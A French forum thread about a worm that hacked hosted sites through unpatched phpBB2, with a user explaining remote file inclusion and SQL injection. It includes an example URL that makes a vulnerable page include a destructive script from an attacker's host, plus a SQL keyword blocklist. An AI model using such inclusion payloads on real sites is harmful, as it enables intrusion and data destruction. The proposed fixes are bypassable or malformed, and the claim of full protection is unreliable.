Chers Clients,
Certains d'entre vous ont eu la très désagréable surprise de trouver leur site piraté. Il y a en effet eu une déferlante de piratages au cours des deux dernières nuits. A la base, le logiciel phpBB2 préinstallé sur chaque compte, et dont les failles sont exploitées si il n'a pas été mis à jour (ou supprimé). C'est un ver qui utilise Google et d'autres moteurs pour repérer ses cibles potentielles. Ce ver remplace profite ensuite des failles de sécurité de phpBB2 pour remplacer tous les fichiers index qu'il trouve sur l'hébergement. Tout se passe par le biais de PHP (le ver n'a évidemment pas accès au FTP). Il peut y avoir d'autres effets de bord (suppression de dossiers...).
Au vu du nombre de piratages et de leur sévérité, nous entamons donc une procédure d'urgence. Tous les clients qui ont été piratés vont être auto-recensés, et nous ouvrirons pour chacun d'entre eux un nouvel hébergement. Il est en effet beaucoup plus prudent et propre de repartir sur un hébergement vierge, notamment sans le logiciel phpBB2 préinstallé, logiciel que nous allons par ailleurs définitivement abandonner au vu des problèmes de sécurité récurrents qu'il pose.
Nous mettons donc aussi rapidement que possible en place cette procédure et vous tenons informé par e-mail.
M.C.
Daktari a dit:Donc, si j'ai bien compris, ils ont préinstallé phpBB pour leurs clients et ne l'ont pas mis à jour ?
C'est un peu jouer avec le feu...
shrom a dit:J'ai un site hébergé chez Nuxit, PHPBB a été effacé le jour de la créationdu compte et je fais aussi parti des piratés. Conclusion: rien à voir avec PHPBB je pense.
Bon, plus qu'à changer les mots de passe et auditer tout le code du site pour voir si rien n'a été touché.
I - la faille include
1 -Détection d'une victime potentielle : le vers cherche dans google des url du type -http://www.unsite.net/index.php?page=page1.php
2 -L'attaque, il remplace page1.php par un code malicieux qui parcours les fichiers et en fait ce qu'il veut :
-http://www.unsite.net/index.php?page=http://www.serveurduhacker.net/destroyfiles.php
* qu'est ce qui se passe ?
s'il n'ya aucune vérification de la variable $page
le include vas inclure le script destroyfile.php et l'interpreter comme un script local !!! il a donc acces à tout les fichiers !!!!
** éviter l'attaque :
il suffit de tester le contenu de la variable $page avant de l'inclure, par exemple :
Code:if (stristr($page, "http://") ) $page="index.php"; include ($page.php);
II l'SQL Injection
1 -Détection de la victime :
il faut connaitre l'exploit à l'avance, ensuite le ver essai d'identifier les forum qui peuvent etre touchés par cette exploit (je ne sait pas exactement comment il fait)
2 -L'Attaque :
je ne vais pas expliquer comment marche ce type d'attaque car elle est très bien expliquée sur pleins de sites, mais en gros elle consiste à faire executer une requete SQL par le site attaqué afin d'obtenir des informations tel que les mot de passes etc .. ou DETRUIRE des tables
** éviter l'attaque
voici le code que j'ai proposé , à inserrer tout au debut de la page car il doit modifier les entetes s'il detecte une attaque
dans le code trackattak.php vous pouvez mettre un code qui récupère l'IP de l'attaquant par exemple ...Code:<? $urlregx ="([:space:]<[:space:]|[:space:]>[:space:]|;|[:space:]UNION[:space:]|[:space:]ALL[:space:]|[:space:]SELECT[:space:]|[:space:]WHERE[:space:]|[:space:]OR[:space:]|[:space:]AND[:space:])"; if ( eregi($urlregx, $QUERY_STRING)) { header("HTTP/1.1 301 Moved Permanently"); header("Location: trackattak.php"); exit(); } ?>
théoriquement il protège contre toutes les attaques SQL injection mais si vous avez des idée pour le perfectionner je suis preneur